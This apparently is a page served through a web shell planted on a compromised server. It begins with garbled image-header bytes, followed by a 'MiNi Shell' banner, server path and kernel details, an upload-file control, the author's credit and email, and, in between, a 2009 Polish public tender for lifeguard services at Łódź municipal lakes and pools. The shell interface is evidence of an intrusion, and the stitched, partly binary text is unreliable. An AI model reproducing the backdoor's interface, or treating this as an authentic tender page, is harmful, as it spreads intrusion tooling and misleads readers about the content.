JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090330/81866-N-2009.html

<p class="kh_header"><b>Łódź: ŚWIADCZENIE USŁUG PRZEZ RATOWNIKÓW NA TERENIE AKWENÓW MOSiR W SEZONIE LETNIM 2009</b><br>
<b>Numer ogłoszenia: 81866 - 2009; data zamieszczenia: 30.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Ks. Skorupki 21, 90-532 Łódź, woj. łódzkie, tel. 042 6361793, faks 042 6367980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład budżetowy podsektora samorządowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG PRZEZ RATOWNIKÓW NA TERENIE AKWENÓW MOSiR W SEZONIE LETNIM 2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Świadczenie usług przez ratowników na terenie akwenów MOSiR w sezonie letnim 2009, a w szczególności:
 
Zakres zlecenia
Obiekt rekreacyjno-wypoczynkowy Stawy Jana
- kąpielisko prowizoryczne , przy ul.Rzgowskiej 247 - 4 stanowiska ratownicze,
- przystań, przy ul. Rzgowskiej 247 - 1 stanowisko ratownicze,
praca od 11.06. do 31.08.2007 tj. 82 dni po 8 godzin dziennie,

Obiekt rekreacyjno-wyposzynkowy Stawy Stefańskiego, 
- kąpielisko prowizoryczne, przy ul. Patriotycznej - 2 stanowiska ratownicze
- przystań, przy ul. Patriotycznej - 1 stanowisko ratownicze
praca od 11.06. do 31.08.2007 tj. 82 dni po 8 godzin dziennie,

 Obiekt rekreacyjno-wypoczynkowy  Arturówek, przy ul. Skrzydlatej 75 obsługa dwóch akwenów wodnych
- kąpielisko prowizoryczne, przy ul. Skrzydlatej 75 - 5 stanowisk ratowniczych,
- przystań, przy ul. Skrzydlatej 75 - 1 stanowisko ratownicze
praca od 11.06. do 31.08.2007 tj. 82 dni po 8 godzin dziennie,

pływalnia Wodny Raj, przy ul. Wiernej Rzeki 2 
obsługa pływalni odkrytej - 3 stanowiska ratownicze
praca od 01.05. do 20.09.2007 tj. 143 dni po 8 godzin dziennie,

pływalnia Promienistych, przy ul. Głowackiego 10/12 
obsługa pływalni odkrytej - 3 stanowiska ratownicze
praca od 11.06. do 31.08.2007 tj. 82 dni po 8 godzin dziennie,

Obowiązki Wykonawcy
1.	Rozpoczęcie pracy i dozorowanie akwenów od godz.1000 do godz. 1800.
2.	Przygotowanie terenu plaży pod względem czystości w każdy dzień eksploatacji kąpieliska.
3.	Dbanie o czystość wód i terenu plaży w zakresie określonym terenem kąpieliska lub pływalni.
4.	Dozór ratowników wodnych nad bezpieczeństwem użytkowników kąpielisk, pływalni i przystani zgodnie z rozporządzeniem RM z dnia 6 maja 1997 r. w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływających, kąpiących się i uprawiających sporty wodne (Dz. U. Nr 57 poz. 358 z dnia 07.06.1997 r.).
5.	Dozór akwenu własnym ratowniczym sprzętem pływającym zgodnym z wymogami załącznika nr 4 rozporządzenia jak wyżej.
- łódź wiosłowa - jedna na 100 m linii brzegowej,
6.	Wyposażenie ratowników w jednorodny strój służbowy z napisem ratownik i oznaczeniem firmowym oraz sprzęt łączności bezprzewodowej.
7.	Wyposażenie i uzupełnianie na bieżąco w niezbędny sprzęt medyczny leki i artykuły sanitarne zgodnie z załącznikiem nr 6 rozporządzenia RM jak wyżej przypadający na każdą pływalnię bądź kąpielisko tj.:
- aparat do sztucznego oddychania - 1 szt.,
- inhalator tlenowy przenośny - 1 szt.,
- nożyczki proste i zakrzywione - 2 szt.,
- opaska uciskowa (szeroka taśma gumowa) - 1 szt.,
- szyna usztywniająca - 3 szt.,
- kieliszek do leków - 1 szt.,
- termometr - 1 szt.,
- maseczki do sztucznego oddychania,
- rękawiczki gumowe.
- amoniak w ampułkach - 3 amp.,
- Panthenol spray - min. 1 op.,
- krople walerianowe - 30 g,
- krople żołądkowe - 1 op.,
- pyralgin (w tabletkach) - 10 szt.,
- solutio Jodi spirituosa (jodyna) - 100 g,
- spirytus skażony - 100 g,
- woda utleniona - 200 g,
- agrafki - 6 szt.,
- chustki trójkątne - 3 szt.,
- gaza wyjałowiona 1/8 m x 1 m - 15 szt.,
- lignina a 100 g,
- opaska gazowa 4 m x 10 cm - 10 szt.,
- opaska elastyczna szerokości 10 cm - 4 szt.,
- opatrunek indywidualny wyjałowiony - 10 szt.,
- prestoplast i poloplast - 10 szt.
8.	Wszyscy ratownicy winni posiadać wymagane uprawnienia.
9.	Ustalenie zasad wzajemnego komunikowania się, ostrzegania oraz reagowania osób korzystających ze sprzętu pływającego, w przypadku wystąpienia zagrożenia.
10.	Udzielanie pomocy przedmedycznej z jednoczesnym wpisaniem w protokół z udzieleniem pierwszej pomocy.
11.	W przypadkach zagrożenia wzywanie pogotowia ratunkowego, policji, straży pożarnej itp.
12.	Nadzór nad przestrzeganiem regulaminu obiektu, porządku i spokoju publicznego.
13.	Współpraca z kierownikiem obiektu i organizatorami innych przedsięwzięć na terenie akwenu.
14.	Oznaczanie stanowiska ratowniczego i punktu medycznego oraz utrzymywanie ich w czystości i porządku.
15.	Ponoszenie odpowiedzialności za bezpieczeństwo kąpiących się i użytkowników sprzętu pływającego na terenie akwenu oraz ratowników.
16.	Wykonawca zobowiązany jest do ubezpieczenia się od odpowiedzialności cywilnej w zakresie obejmującym przedmiot wykonywanej usługi.
17.	Ustalenie zasad wzajemnego komunikowania się, między ratownikami.
18.	W czasie zamknięcia kąpielisk / pływalni odkrytych:
- zorganizowanie dyżurów ratowników na akwenach.
- nie dopuszczanie osób do użytkowania kąpielisk, a także informowanie o ewentualnych zagrożeniach wynikających z zażywania kąpieli. 

Obowiązki Zamawiającego
1.	Zamawiający przekaże informacje dotyczące ilości i rodzaju sprzętu pływającego na akwenach MOSiR przygotowanego do eksploatacji.
2.	Zamawiający zabezpieczy pomieszczenia socjalne dla pracowników Wykonawcy.
3.	Oznaczenie terenu wokół stawów tabliczkami informującymi o zakazie kąpielisk poza wyznaczonymi miejscami.

Ogólny zakres czynności i obowiązków ratowników na kąpieliskach i pływalniach
1.	Przed objęciem stanowiska ratowniczego ratownik powinien zorganizować i wyposażyć stanowisko pracy poprzez:
a.	wystawienie sprzętu ratowniczego i sprawdzenie jego stanu sprawności,
b.	wystawienie sprzętu pierwszej pomocy przedmedycznej i sprawdzenie jego stan ilościowy,
c.	dokonanie penetracji dna akwenu i usunięcia niebezpiecznych przedmiotów,
d.	sprawdzenie stanu technicznego urządzeń i stanu nawierzchni plaży,
e.	sprawdzenie sprzętu: informacyjnego, ratunkowego i pomocniczego,
f.	wywieszenie flag,
g.	wypisanie na tablicy informacyjnej temperatury powietrza, wody, zawartości chloru/ dot.pływalni/ - czynności te należy powtarzać 3 razy w ciągu dnia,
h.	wyznaczenie terenu kąpieliska na akwenach przy ul.Skrzydlatej 75, przy 
ul. Rzgowskiej 247, przy ul. Patriotycznej 3.
i.	dokonywanie wpisu w dzienniku pracy ratownika,
2.	Po zakończeniu dozoru ratownik podejmuje następujące czynności:
a.	dokonuje penetracji dna akwenu wodnego,
b.	sprawdza stan techniczny urządzeń i zgłasza uszkodzenia,
c.	demontuje stanowisko pracy tj. znosi sprzęt, zdejmuje flagi, oznakowanie terenu kąpieliska, itp.,
d.	informuje o stanie ilościowym sprzętu pomocy przedmedycznej.
3.	Udzielanie pierwszej pomocy przedmedycznej.
4.	W przypadkach zagrożenia wzywanie pogotowia ratunkowego, policji, straży pożarnej itp.
5.	Współpraca z kierownikiem obiektu i organizatorami innych przedsięwzięć na terenie akwenu.
6.	Oznaczanie stanowiska ratowniczego i punktu medycznego oraz utrzymywanie ich w czystości i porządku. 
7.	Komunikowanie się, ostrzeganie oraz reagowanie wobec osób korzystających z kąpielisk bądź pływalni, w przypadku wystąpienia zagrożenia między ratownikami.
8.	Dozór akwenu i ratowanie tonących.

Szczegółowy zakres czynności ratownika na przystani
1.	Przyjęcia do eksploatacji sprzętu pływającego przeznaczonego do rekreacji na akwenach MOSiR.
2.	Ustalenie zasad wyposażenia w sprzęt zabezpieczający (kapoki itp.) osób korzystających z dostępnych jednostek i sprzętu pływającego.
3.	Bieżący dozór akwenu w zakresie:
a.	zachowania warunków bezpiecznej eksploatacji sprzętu przez ich użytkowników,
b.	bieżącej kontroli, aby eksploatowany sprzęt pływający był sprzętem MOSiR-u (współpraca z pracownikiem MOSiR)
c.	zagospodarowania i eksploatacji przystani i sprzętu pływającego.
4.	Dozór nad ogólnym bezpieczeństwem osób korzystających z przestrzeni akwenu, określonej w załącznikach (rzuty).
5.	Komunikowanie się, ostrzeganie oraz reagowanie wobec osób korzystających ze sprzętu pływającego, w przypadku wystąpienia zagrożenia.
6.	Wykonywanie czynności zawartych w pkt. IV niniejszego regulaminu w zakresie obsługi przystani.
7.	Wycofanie z akwenów sprzętu niebędącego własnością MOSiR..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 93.50.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki ogólne i szczegółowe:
1.	Warunki:
1.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
art. 24 ust. 1, 2 ustawy.
2.	Opis oceny spełnienia warunków:
2.1.	Doświadczenie:
Wykonawca musi wykazać, że w ciągu ostatnich 3 lat kalendarzowych (licząc od dnia wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej jedną pracę o tożsamym charakterze; tzn. związaną z prowadzeniem działalności w zakresie ochrony pływalni bądź akwenu. Wartość tej pracy musi być nie mniejsza niż 80.000 PLN,
2.2.	Potencjał techniczny:
Wykonawca musi dysponować: aparatem do sztucznego oddychania - minimum 6 szt., inhalatorem tlenowym przenośnym - minimum 6 szt., łodziami wiosłowymi -  minimum 3 sztuki,
2.3.	Potencjał finansowo-ekonomiczny:
Wykonawca musi wykazać posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia na wartość co najmniej 100.000,00 PLN (słownie: sto tysięcy złotych).
3.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia: 
3.1.	Muszą wykazać, że łącznie spełniają warunek określony w punktach 2.1. - 2.3.
3.2.	Ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania.
3.3.	Muszą ustanowić Pełnomocnika Wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje również pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów.
3.4.	Pełnomocnictwo musi jednocześnie wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną, fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie z Pełnomocnikiem.
3.5.	Przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może wezwać do przedstawienia umowy regulującej współpracę tych Wykonawców.
4.	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu  albo konieczne byłoby unieważnienie postępowania.
5.	Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty, o których mowa w specyfikacji, na zasadzie spełnia lub nie spełnia wymaganego warunku. Wykonawcy, którzy nie spełnią wymaganych warunków lub nie złożą oświadczeń i dokumentów potwierdzających ich spełnianie, zostaną wykluczeni z postępowania, a ich oferty zostaną uznane za odrzucone..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wraz z ofertą wypełnioną na Formularzu oferty należy załączyć:
1.1.	Oświadczenie Wykonawcy, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1, 2 ustawy Pzp - załącznik nr 1 do oferty.
1.2.	Oświadczenie Wykonawcy o spełnianiu warunków wskazanych w art. 22 ust. 1 ustawy Pzp - załącznik Nr 2 do oferty.
1.3.	Wypełniony formularz ofertowy.
1.4.	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie - załącznik nr 3 do oferty.
1.5.	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje Wykonawca - załącznik nr 4 do oferty.
1.6.	Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
1.7.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.8.	Polisę, a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej dotyczącej przedmiotowej usługi na kwotę nie niższą niż 100.000 PLN.
1.9.	Pełnomocnictwo o ile ofertę składa pełnomocnik.
1.10.	Dokument potwierdzający uprawnienie do wykonywania zadań w zakresie bezpieczeństwa osób pływających, kąpiących się i uprawiających sporty wodne wymagany w § 7 pkt. 1 rozporządzenia RM z dnia 6 maja 1997 r. w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływających, kąpiących się i uprawiających sporty wodne (Dz. U. Nr 57 poz. 358 z dnia 07.06.1997 r.).
2.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punktach 1.6. i 1.7. składa odpowiedni dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2.1.	Dokumenty o których mowa w pkt 2. ust. a) i c) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt. 2. ust. b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków.
3.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie 2., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
4.	Zasady składania oferty przez podmioty występujące wspólnie:
4.1.	Podmioty zobowiązane są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
4.2.	Wymagane oświadczenia i dokumenty wskazane w pkt. 1.1., 1.2., 1.6., 1.7. muszą być złożone przez każdy podmiot..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mosir.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji
Dział Techniczny
90-532 Łódź, ul. ks. Skorupki 21
pokój 020.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 09:55, miejsce: Miejski Ośrodek Sportu i Rekreacji
Sekretariat pokój 203
90-532 Łódź, ul. ks. Skorupki 21.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com